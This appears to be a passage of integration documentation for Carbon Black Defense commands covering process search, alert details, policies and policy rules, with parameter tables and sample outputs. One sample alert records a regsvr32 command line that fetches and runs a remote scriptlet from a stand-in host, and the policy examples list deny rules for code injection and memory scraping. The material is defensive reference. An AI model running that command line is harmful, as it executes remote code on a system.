hostNameExact | The exact hostname. | Case sensitive. |
ownerName | Case insensitive owner name. | Case in sensitive. |
ownerNameExact |
Exact owner name |
Case sensitive. |
ipAddress | External or internal IP address | - |
searchWindow |
Events generated within a given time frame |
Default is one day. Events may not be available after 30 days due to retention policies. |
start | Shows result from this row and after | - |
rows | Maximum number of rows of result | This parameter can be limited on the Cb Defense server side. |
Context Output
Path | Description |
CarbonBlackDefense.GetProcesses.ApplicationName | Application name |
CarbonBlackDefense.GetProcesses.ProcessId | Process ID |
CarbonBlackDefense.GetProcesses.NumEvents | Number of events |
CarbonBlackDefense.GetProcesses.ApplicationPath | Application path |
CarbonBlackDefense.GetProcesses.PrivatePid | Private PID |
CarbonBlackDefense.GetProcesses.Sha256Hash | SHA-256 hash |
CarbonBlackDefense.GetProcesses.TotalResults | Total results |
Command Example
!cbd-find-processes ipAddress="67.143.208.113" rows=2
Context Example
CarbonBlackDefense:{} 1 item GetProcesses:[] 3 items 0:{} 6 items ApplicationName:Google Chrome ApplicationPath:/Applications/Google Chrome.app/Contents/MacOS/Google Chrome NumEvents:3580 PrivatePid:81577-1533502547808-202 ProcessId:81577 Sha256Hash:19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d 1:{} 6 items ApplicationName:cloud-drive-ui ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui NumEvents:2038 PrivatePid:1071-1533502548722-245 ProcessId:1071 Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b 2:{} 1 item TotalResults:2
Human Readable Output
ApplicationName | ApplicationPath | NumEvents | PrivatePid | ProcessId | Sha256Hash |
---|---|---|---|---|---|
Google Chrome | /Applications/Google Chrome.app/Contents/MacOS/Google Chrome | 3580 | 81577-1533502547808-202 | 81577 | 19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d |
cloud-drive-ui | /Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui | 2038 | 1071-1533502548722-245 | 1071 | f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b |
Get alert details
Returns the details of a specified alert.
Base Command
cbd-get-alert-details
Input
Parameter | Description |
alertId | Alert ID |
Context Output
Path | Description |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceType | Device type |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Group | Group |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.GroupId | Group ID |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.RegisteredTime | Registered time |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceId | Device ID |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceName | Device name |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Status | Status |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.OsVersion | OS version |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.SensorVersion | Sensor version |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.UserName | User name |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Importance | Importance |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Message | Message |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Success | Success |
CarbonBlackDefense.GetAlertDetails.Events.ParentHash | Parent hash |
CarbonBlackDefense.GetAlertDetails.Events.PolicyState | Policy state |
CarbonBlackDefense.GetAlertDetails.Events.LongDescription | Long description |
CarbonBlackDefense.GetAlertDetails.Events.ParentPid | Parent PID |
CarbonBlackDefense.GetAlertDetails.Events.ProcessId | Process ID |
CarbonBlackDefense.GetAlertDetails.Events.ThreatIndicators | Threat indicators |
CarbonBlackDefense.GetAlertDetails.Events.ApplicationPath | Application path |
CarbonBlackDefense.GetAlertDetails.Events.ProcessHash | Process hash |
CarbonBlackDefense.GetAlertDetails.Events.ProcessMd5Hash | Process MD5 hash |
CarbonBlackDefense.GetAlertDetails.Events.EventId | Event ID |
CarbonBlackDefense.GetAlertDetails.Events.EventTime | Event time |
CarbonBlackDefense.GetAlertDetails.Events.EventType | Event type |
CarbonBlackDefense.GetAlertDetails.Events.KillChainStatus | Kill chain status |
CarbonBlackDefense.GetAlertDetails.Events.ParentName | Parent name |
CarbonBlackDefense.GetAlertDetails.Events.ParentPPid | ParentP PID |
CarbonBlackDefense.GetAlertDetails.Events.ProcessPPid | ProcessP PID |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.IncidentId | Incident ID |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.ApplicationName | Application name |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.IndicatorName | Indicator name |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.Sha256Hash | SHA-256 hash |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Summary | Summary |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatId | Threat ID |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatScore | Threat score |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Time | Time |
Command Example
!cbd-get-alert-details alertId=HWOXYQ6P
Context Example
Account:{} 2 items CarbonBlackDefense:{} 2 items GetAlertDetails:{} 1 item DeviceInfo:{} 4 items DeviceInfo:{} 13 items DeviceName:ECIADWS7 Success:true Message:success RegisteredTime:1525879595477 DeviceType:WINDOWS DeviceId:896327 Status:REGISTERED OsVersion:Windows 7 x86 SP: 1 Importance:MEDIUM UserName:EVILCORP\Expel GroupId:0 SensorVersion:3.1.0.100 Group:null Events:{} 17 items OrgId:1105 ThreatInfo:{} 6 items IncidentId:HWOXYQ6P Indicators:{} 3 items ApplicationName:[] 64 items IndicatorName:[] 64 items Sha256Hash:[] 64 items Summary:The application regsvr32.exe is executing an encoded fileless script. ThreatId:218c1859d76eb42113590f9da21e2cec ThreatScore:5 Time:1533253999790 GetProcesses:[] 3 items 0:{} 6 items ApplicationName:Google Chrome ApplicationPath:/Applications/Google Chrome.app/Contents/MacOS/Google Chrome NumEvents:3580 PrivatePid:81577-1533502547808-202 ProcessId:81577 Sha256Hash:19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d 1:{} 6 items ApplicationName:cloud-drive-ui ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui NumEvents:2038 PrivatePid:1071-1533502548722-245 ProcessId:1071 Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b 2:{} 1 item TotalResults:2 Endpoint:{} 2 items Hostname:ECIADWS7 OS:WINDOWS Process:{} 7 items CommandLine:regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll Endpoint:ECIADWS7 MD5:432be6cf7311062633459eef6b242fb5 PID:12804 ParentID:10808 ParentName:alert_generator.bat Path:C:\Windows\System32\regsvr32.exe
Get all policy details.
Returns the details of all policies. the details
Base Command
cbd-get-policies
Input
There is no input for this command.
Context Output
Path | Description |
CarbonBlackDefense.GetPolicies.Id | The policy ID |
CarbonBlackDefense.GetPolicies.PriorityLevel | The policy's priority level |
CarbonBlackDefense.GetPolicies.SystemPolicy | System policy ( boolean ) |
CarbonBlackDefense.GetPolicies.LatestRevision | The policy's latest revision |
CarbonBlackDefense.GetPolicies.Policy | The policy object |
Command Example
!cbd-get-policies
Context Example
CarbonBlackDefense:{} 1 item GetPolicies:[] 40 items 0:{} 5 items Id:6525 LatestRevision:1488926710902 Policy:{} 6 items avSettings:{} 6 items apc:{} 4 items enabled:false maxExeDelay:45 maxFileSize:4 riskLevel:4 features:[] 3 items 0:{} 2 items enabled:false name:SIGNATURE_UPDATE 1:{} 2 items enabled:false name:ONACCESS_SCAN 2:{} 2 items enabled:true name:ONDEMAND_SCAN onAccessScan:{} 1 item profile:NORMAL onDemandScan:{} 4 items profile:NORMAL scanCdDvd:AUTOSCAN scanUsb:AUTOSCAN schedule:{} 4 items days:null rangeHours:0 recoveryScanIfMissed:true startHour:0 signatureUpdate:{} 1 item schedule:{} 3 items fullIntervalHours:0 initialRandomDelayHours:4 intervalHours:4 updateServers:{} 2 items servers:[] 1 item 0:{} 3 items flags:0 regId:null server:[] 1 item 0:http://updates.cdc.carbonblack.io/update serversForOffSiteDevices:[] 1 item 0:http://updates.cdc.carbonblack.io/update directoryActionRules:[] 0 items id:-1 knownBadHashAutoDeleteDelayMs:null rules:[] 0 items sensorSettings:[] 24 items 0:{} 2 items name:ALLOW_UNINSTALL value:true 1:{} 2 items name:ALLOW_UPLOADS value:false 2:{} 2 items name:SHOW_UI value:false 3:{} 2 items name:ENABLE_THREAT_SHARING value:true 4:{} 2 items name:QUARANTINE_DEVICE value:false 5:{} 2 items name:LOGGING_LEVEL value:NORMAL 6:{} 2 items name:QUARANTINE_DEVICE_MESSAGE value:Your device has been quarantined. Please contact your administrator. 7:{} 2 items name:SET_SENSOR_MODE value:0 8:{} 2 items name:SENSOR_RESET value:0 9:{} 2 items name:BACKGROUND_SCAN value:false 10:{} 2 items name:POLICY_ACTION_OVERRIDE value:true 11:{} 2 items name:HELP_MESSAGE value: 12:{} 2 items name:PRESERVE_SYSTEM_MEMORY_SCAN value:false 13:{} 2 items name:HASH_MD5 value:false 14:{} 2 items name:SCAN_LARGE_FILE_READ value:false 15:{} 2 items name:SCAN_EXECUTE_ON_NETWORK_DRIVE value:false 16:{} 2 items name:DELAY_EXECUTE value:false 17:{} 2 items name:SCAN_NETWORK_DRIVE value:false 18:{} 2 items name:BYPASS_AFTER_LOGIN_MINS value:0 19:{} 2 items name:BYPASS_AFTER_RESTART_MINS value:0 20:{} 2 items name:SHOW_FULL_UI value:false 21:{} 2 items name:SECURITY_CENTER_OPT value:false 22:{} 2 items name:CB_LIVE_RESPONSE value:false 23:{} 2 items name:UNINSTALL_CODE value:false PriorityLevel:MEDIUM SystemPolicy:true
Get the details of a specified policy
Returns the details of a specified policy.
Base Command
cbd-get-policy
Input
Parameter | Description |
policyId | Policy ID |
Context Output
Path | Description |
CarbonBlackDefense.GetPolicy.Id | The policy ID |
CarbonBlackDefense.GetPolicy.PriorityLevel | The policy's priority level |
CarbonBlackDefense.GetPolicy.SystemPolicy | System policy ( boolean ) |
CarbonBlackDefense.GetPolicy.LatestRevision | The policy's latest revision |
CarbonBlackDefense.GetPolicy.Policy | The policy object |
Command Example
!cbd-get-policy policyId=6525
Context Example
CarbonBlackDefense:{} 1 item GetPolicy:{} 5 items Id:6525 LatestRevision:1488926710902 Policy:{} 6 items avSettings:{} 6 items apc:{} 4 items enabled:false maxExeDelay:45 maxFileSize:4 riskLevel:4 features:[] 3 items 0:{} 2 items enabled:false name:SIGNATURE_UPDATE 1:{} 2 items enabled:false name:ONACCESS_SCAN 2:{} 2 items enabled:true name:ONDEMAND_SCAN onAccessScan:{} 1 item profile:NORMAL onDemandScan:{} 4 items profile:NORMAL scanCdDvd:AUTOSCAN scanUsb:AUTOSCAN schedule:{} 4 items days:null rangeHours:0 recoveryScanIfMissed:true startHour:0 signatureUpdate:{} 1 item schedule:{} 3 items fullIntervalHours:0 initialRandomDelayHours:4 intervalHours:4 updateServers:{} 2 items servers:[] 1 item 0:{} 3 items flags:0 regId:null server:[] 1 item 0:http://updates.cdc.carbonblack.io/update serversForOffSiteDevices:[] 1 item 0:http://updates.cdc.carbonblack.io/update directoryActionRules:[] 0 items id:-1 knownBadHashAutoDeleteDelayMs:null rules:[] 0 items sensorSettings:[] 24 items 0:{} 2 items name:ALLOW_UNINSTALL value:true 1:{} 2 items name:ALLOW_UPLOADS value:false 2:{} 2 items name:SHOW_UI value:false 3:{} 2 items name:ENABLE_THREAT_SHARING value:true 4:{} 2 items name:QUARANTINE_DEVICE value:false 5:{} 2 items name:LOGGING_LEVEL value:NORMAL 6:{} 2 items name:QUARANTINE_DEVICE_MESSAGE value:Your device has been quarantined. Please contact your administrator. 7:{} 2 items name:SET_SENSOR_MODE value:0 8:{} 2 items name:SENSOR_RESET value:0 9:{} 2 items name:BACKGROUND_SCAN value:false 10:{} 2 items name:POLICY_ACTION_OVERRIDE value:true 11:{} 2 items name:HELP_MESSAGE value: 12:{} 2 items name:PRESERVE_SYSTEM_MEMORY_SCAN value:false 13:{} 2 items name:HASH_MD5 value:false 14:{} 2 items name:SCAN_LARGE_FILE_READ value:false 15:{} 2 items name:SCAN_EXECUTE_ON_NETWORK_DRIVE value:false 16:{} 2 items name:DELAY_EXECUTE value:false 17:{} 2 items name:SCAN_NETWORK_DRIVE value:false 18:{} 2 items name:BYPASS_AFTER_LOGIN_MINS value:0 19:{} 2 items name:BYPASS_AFTER_RESTART_MINS value:0 20:{} 2 items name:SHOW_FULL_UI value:false 21:{} 2 items name:SECURITY_CENTER_OPT value:false 22:{} 2 items name:CB_LIVE_RESPONSE value:false 23:{} 2 items name:UNINSTALL_CODE value:false PriorityLevel:MEDIUM SystemPolicy:true
Human Readable Output
Id | 6525 |
---|---|
LatestRevision | 1488926710902 |
Policy | {"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"name":"HELP_MESSAGE","value":""},{"name":"PRESERVE_SYSTEM_MEMORY_SCAN","value":"false"},{"name":"HASH_MD5","value":"false"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHO ...http://updates.cdc.carbonblack.io/update"],"servers":[{"server":["http://updates.cdc.carbonblack.io/update"],"flags":0,"regId":null}]},"apc":{"maxFileSize":4,"maxExeDelay":45,"riskLevel":4,"enabled":false},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"days":null,"rangeHours":0,"startHour":0,"recoveryScanIfMissed":true}},"signatureUpdate":{"schedule":{"intervalHours":4,"fullIntervalHours":0,"initialRandomDelayHours":4}}},"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[]} |
PriorityLevel | MEDIUM |
SystemPolicy | true |
Create a policy
Creates a policy, as prescribed by further input.
Base Command
cbd-create-policy
Input
Parameter | Description |
description | Policy description |
name | A single line name for the policy |
priorityLevel | Priority score associated with sensors assigned to this policy |
policy |
JSON object containing the policy details. Make sure a valid policy object is passed:
|
Context Output
Path | Description |
CarbonBlackDefense.CreatePolicy.PolicyId | The new policy ID |
Command Example
!cbd-create-policy priorityLevel=LOW name=YARDENTEST3 description=yardentesttest3 policy={ "policyInfo": { "description": "test policy for documentation", "name": "documentation test", "policy": { "avSettings": { "apc": { "enabled": false, "maxExeDelay": 45, "maxFileSize": 4, "riskLevel": 4 }, "features": [ { "enabled": false, "name": "SIGNATURE_UPDATE" }, { "enabled": true, "name": "ONACCESS_SCAN" }, { "enabled": true, "name": "ONDEMAND_SCAN" } ], "onAccessScan": { "profile": "NORMAL" }, "onDemandScan": { "profile": "NORMAL", "scanCdDvd": "AUTOSCAN", "scanUsb": "AUTOSCAN", "schedule": { "days": null, "rangeHours": 0, "recoveryScanIfMissed": true, "startHour": 0 } }, "signatureUpdate": { "schedule": { "fullIntervalHours": 0, "initialRandomDelayHours": 4, "intervalHours": 2 } }, "updateServers": { "servers": [ { "flags": 0, "regId": null, "server": [ "http://updates.cdc.carbonblack.io/update" ] } ], "serversForOffSiteDevices": [ "http://updates.cdc.carbonblack.io/update" ] } }, "directoryActionRules": [ { "actions": { "FILE_UPLOAD": false, "PROTECTION": false }, "path": "C:\\FXCM\\**" }, { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "sadf" }, { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "/Users/**" } ], "id": -1, "rules": [ { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 1, "operation": "RUN", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "COMPANY_BLACK_LIST" }, "id": 2, "operation": "RUN", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 3, "operation": "NETWORK", "required": false }, { "action": "TERMINATE", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 5, "operation": "RANSOM", "required": false }, { "action": "IGNORE", "application": { "type": "NAME_PATH", "value": "**\\devenv.exe" }, "id": 4, "operation": "RANSOM", "required": false }, { "action": "DENY", "application": { "type": "NAME_PATH", "value": "%SystemDrive%\\Windows\\System32\\notepad2.exe" }, "id": 10, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 11, "operation": "RANSOM", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 13, "operation": "MEMORY_SCRAPE", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 14, "operation": "CODE_INJECTION", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 15, "operation": "RUN_INMEMORY_CODE", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 17, "operation": "POL_INVOKE_NOT_TRUSTED", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 18, "operation": "INVOKE_CMD_INTERPRETER", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 20, "operation": "INVOKE_SCRIPT", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "RESOLVING" }, "id": 22, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "PUP" }, "id": 23, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "SUSPECT_MALWARE" }, "id": 24, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 25, "operation": "NETWORK", "required": false }, { "action": "ALLOW", "application": { "type": "NAME_PATH", "value": "c:\\test\\**" }, "id": 26, "operation": "INVOKE_SCRIPT", "required": false } ], "sensorSettings": [ { "name": "SHOW_UI", "value": "true" }, { "name": "BACKGROUND_SCAN", "value": "true" }, { "name": "POLICY_ACTION_OVERRIDE", "value": "true" }, { "name": "QUARANTINE_DEVICE_MESSAGE", "value": "Your device has been quarantined by your computer administrator." }, { "name": "LOGGING_LEVEL", "value": "false" }, { "name": "ALLOW_UNINSTALL", "value": "true" }, { "name": "QUARANTINE_DEVICE", "value": "false" }, { "name": "RATE_LIMIT", "value": "0" }, { "name": "CONNECTION_LIMIT", "value": "0" }, { "name": "QUEUE_SIZE", "value": "100" }, { "name": "LEARNING_MODE", "value": "0" }, { "name": "SCAN_NETWORK_DRIVE", "value": "true" }, { "name": "BYPASS_AFTER_LOGIN_MINS", "value": "0" }, { "name": "BYPASS_AFTER_RESTART_MINS", "value": "0" }, { "name": "SCAN_EXECUTE_ON_NETWORK_DRIVE", "value": "true" }, { "name": "DELAY_EXECUTE", "value": "true" }, { "name": "PRESERVE_SYSTEM_MEMORY_SCAN", "value": "false" }, { "name": "HASH_MD5", "value": "false" }, { "name": "SCAN_LARGE_FILE_READ", "value": "false" }, { "name": "SHOW_FULL_UI", "value": "true" }, { "name": "HELP_MESSAGE", "value": "CarbonBlack" }, { "name": "SECURITY_CENTER_OPT", "value": "true" }, { "name": "CB_LIVE_RESPONSE", "value": "true" }, { "name": "UNINSTALL_CODE", "value": "false" } ] }, "priorityLevel": "LOW", "version": 2 } }
Context Example
CarbonBlackDefense:{} 1 item CreatePolicy:{} 1 item PolicyId:21356
Human Readable Output
PolicyId | 21356 |
---|
Update a policy
Updates an existing policy.
Base Command
cbd-update-policy
Input
Parameter | Description |
description | Policy description |
name | A single line name for the policy |
priorityLevel | Priority score associated with sensors assigned to this policy. |
id |
The ID of the policy to update. |
policy |
JSON object containing the policy details. Make sure a valid policy object is passed:
|
Context Output
There is no context output for this command.
Command Example
!cbd-update-policy id=21355 priorityLevel=LOW description="woot" name="boot" policy={"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[],"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"value":"","name":"HELP_MESSAGE"},{"value":"false","name":"PRESERVE_SYSTEM_MEMORY_SCAN"},{"value":"false","name":"HASH_MD5"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHOW_FULL_UI","value":"false"},{"name":"SECURITY_CENTER_OPT","value":"false"},{"name":"CB_LIVE_RESPONSE","value":"false"},{"name":"UNINSTALL_CODE","value":"false"}],"avSettings":{"signatureUpdate":{"schedule":{"initialRandomDelayHours":4,"fullIntervalHours":0,"intervalHours":4}},"features":[{"enabled":false,"name":"SIGNATURE_UPDATE"},{"enabled":false,"name":"ONACCESS_SCAN"},{"name":"ONDEMAND_SCAN","enabled":true}],"updateServers":{"servers":[{"flags":0,"regId":null,"server":["http://updates.cdc.carbonblack.io/update"]}],"serversForOffSiteDevices":["http://updates.cdc.carbonblack.io/update"]},"apc":{"maxExeDelay":45,"riskLevel":4,"enabled":false,"maxFileSize":4},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"startHour":0,"recoveryScanIfMissed":true,"days":null,"rangeHours":0}}}}
Human Readable Output
Request Success
Delete a policy
Deletes a specified policy.
Base Command
cbd-delete-policy
Input
Parameter | Description |
policyId | Policy ID |
Context Output
There is no context output for this command.
Human Readable Output
Request Success
Add a rule to a policy
Adds a specified rule to a specified policy.
Base Command
cbd-add-rule-to-policy
Input
Parameter | Description |
action | Rule action |
operation | Rule operation |
required | Rule required |
id | Rule ID |
type | Application type |
value | Application value |
policyId | Policy ID |
Context Output
There is no context output for this command.
Command Example
!cbd-add-rule-to-policy action="TERMINATE" id="7777" operation="RANSOM" required="false" type="REPUTATION" policyId="21355" value="COMPANY_BLACK_LIST"
Human Readable Output
Request Success
Delete a rule from a policy
Deletes a specified rule from a specified policy.
Base Command
cbd-delete-rule-from-policy
Input
Parameter | Description |
policyId | ID of the policy to delete the rule from |
ruleId | ID of the rule to delete |
Context Output
There is no context output for this command.
Command Example
!cbd-delete-rule-from-policy ruleId=2 policyId=21355
Human Readable Output
Request Success
Update a rule in a policy
Updates a rule in a specified policy.
Base Command
cbd-update-rule-in-policy
Input
Parameter | Description |
action | Rule action |
operation | Rule operation |
required | Rule required |
id | Rule ID |
type | Application type |
value | Application value |
policyId | Policy ID |
Context Output
There is no context output for this command.
Command Example
!cbd-update-rule-in-policy action="TERMINATE" id=1 operation=RANSOM policyId=21355 required=false type=REPUTATION value=COMPANY_BLACK_LIST
Human Readable Output
Request Success
Set a policy
Sets a specified policy.
Base Command
cbd-set-policy
Input
Parameter | Description |
keyValue |
A JSON object that holds key-value pairs. Key is the field path in the policy object to update with value. |
policy |
The policy to set. |
Context Output
There is no context output for this command.